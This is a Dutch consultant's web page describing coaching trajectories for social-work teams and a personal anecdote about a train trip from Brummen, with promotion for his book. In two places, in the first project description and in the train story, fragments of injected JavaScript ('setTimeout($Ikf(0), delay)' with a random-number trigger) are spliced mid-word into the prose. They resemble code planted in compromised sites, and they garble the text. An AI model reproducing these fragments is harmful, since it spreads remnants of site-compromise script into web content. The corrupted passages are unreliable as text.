Een stedelijk werkend opbouwwerkteam wilde graag hun oude werkwijze tegen het licht houden. De maatschappelijk ontwikkelingen boden nieuwe kansen maar hoe konden ze die nou benutten?  In vier sessies zoomden we in op de behoefte van klanten, op identiteit van het team, op de interne dynamiek, op nieuwe ontwikkelingen en op wat er aldus nog te doen stond voor het inslaan van een nieuwe koers. En daarbinnen natuurlijk prioriteiten aangeven. Naast de procesbegeleiding deed ik ook de verslaglegging en leverde ik een advies op voor het managementteam.

Strategie en rol

Een team communicatieadviseurs van een grote regionale koepel van sociaal werk organisaties voelde de behoefte om aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht te geven aan digitale communicatie. Enerzijds om derden duidelijk te maken hoe en waarmee de moederorganisatie de lokale dochters ondersteunt. Anderzijds om te bepalen hoe zij sociaal werkers in die locale welzijnsinstellingen zo goed mogelijk konden faciliteren bij het zichtbaar maken van hun meerwaarde via social media.  Ook hier gaf ik input voor een sociaal media strategie en praat ik ze bij over actuele social media en gaf ik feedback op wat ze tot dan toe online hadden laten zien.

“Zeer praktische training met een duidelijk stappenplan. Erg fijn!”

Mixen tot maatwerk

Deze trajecten zijn echt maatwerk. De behoefte van de opdrachtgever is het uitgangspunt en in overleg worden ze samengesteld. Heel leuk om te doen, want ik kan er mijn creativiteit in kwijt. Het is een sport om een traject te ontwerpen dat naadloos aansluit. En aan de reacties te merken lukt dat.

“Het was een goede bijeenkomst, waar wij zeker mee verder kunnen? bedankt!”

Hebben jouw teams ook zo’n soort vraag? Neem dan even contact met mij op. Ik denk graag met je mee of ik iets voor je kan betekenen. Je kan mij bereiken via 0644062029 of info@welzijn30.nl 

Groeten, Hans Versteegh

Heb je mijn boek al gereserveerd? https://www.welzijn30.nl/digivaardig-sociaal-werk/ 

Veels te relaxed

Veels te relaxedHet was een vergissing om veels te relaxed door Brummen naar het station te lopen. Op het goedbezochte vrijwillgers-festival, even daarvoor, had ik aan vrijwiligers van Stichting Welzijn Brummen een social media workshop gegeven. Erg aardige mensen. Zeer geïnteresseerd. Helemaal top. 

Daarna in een koningsdag-achtige sfeer nog wat gekeuveld met diverse sociaal werkers en de directrice. Allemaal hele hartelijke leuke mensen. Ook super. 

De friet bakkende jongerenwerker stilde mijn honger met het beste patatje dat ik ooit heb gegeten. Wauw! 

Een hoogbejaarde dame van het lokale koor kreeg een lekker hamburgertje. Zich druk maken over de niet dáárvoor bestemde consumptiebon bleek niet nodig.”Smakelijk mevrouw!” Kijk. 

In die gemoedstoestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and begaf ik mij naar de trein. Die had twee keuzes: Arnhem of Zutphen. Ik koos Arnhem en liep perron 2 op. Twee studenten op weg naar een avondje stappen zeiden vriendelijk gedag. Ah, daar zag ik al twee gele lampen in de verte. 

In de trein las ik het boek Artificial Intelligence in actie, van Schepper en Hiddink. Een toegankelijk boek waarin kunstmatige intelligentie begrijpelijk uitgelegd wordt. Leuk! Ik dook er helemaal in.

Tot vlak voor Driebergen-Zeist, mijn eindstation, de conductrice er achter kwam dat ik niet had ingechecked bij de NS met mijn OV-kaart. “Ik zie wel dat Syntus blij met u is, in- en uitgechecked. Maar ik niet.” Oh jee!

Ik, die toch qua digitalisering m’n mannetje denk te staan. Domweg te gewend aan fysieke poortjes in grote stations ga ik meteen de mist in wanneer de doorgang naar het perron een keer niet versperd wordt. Want op perron 2, in het relaxte Brummen was ik straal voorbij gelopen aan de gele incheck-paaltjes. Gewoon niet aan gedacht, voortsudderend in de roes van gezelligheid en vriendelijkheid. 

De conductrice liet me twee minuten later zonder boete de trein uit gaan.”Nou niet uitchecken! Dat kost u 20 euro!” Die tip knoopte ik in mijn oren. Illegaal verliet ik het station. Mijn geluk? Ook geen poortjes in Driebergen.

Beter zo. 

“En wanneer verschijnt jouw boek eigenlijk?” hoor ik nu regelmatig.  “Als het goed is oktober,” zeg ik dan. Maar je kan het nu alvast bestellen: https://www.welzijn30.nl/digivaardig-sociaal-werk/